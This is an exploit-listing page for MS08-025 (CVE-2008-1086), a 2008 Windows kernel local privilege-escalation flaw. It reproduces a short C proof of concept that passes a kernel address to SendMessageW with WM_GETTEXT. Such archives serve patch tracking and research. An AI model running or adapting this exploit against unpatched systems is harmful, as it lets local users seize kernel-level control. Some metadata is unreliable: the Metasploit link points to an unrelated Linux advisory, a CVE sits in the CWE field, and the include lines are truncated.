header-logo
Suggest Exploit
vendor:
Windows
by:
Whitecell's Polymorphours
7.2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: Windows
Affected Version From: Microsoft Windows
Affected Version To: Microsoft Windows
Patch Exists: YES
Related CWE: CVE-2008-1086
CPE: o:microsoft:windows
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0631/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Microsoft Windows Local Privilege Escalation Vulnerability

Microsoft Windows is prone to a local privilege-escalation vulnerability. The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.

Mitigation:

Apply the appropriate patch from the vendor.
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/28554/info

Microsoft Windows is prone to a local privilege-escalation vulnerability.

The vulnerability resides in the Windows kernel. A locally logged-in user can exploit this issue to gain kernel-level access to the operating system.
*/


#include 
#include 

int main(int argc,char *argv[])
{
    DWORD    dwHookAddress = 0x80000000;

    printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );
        printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" );

    SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );
    return 0;
}

Navigation

Suggest Exploit

Services By CQR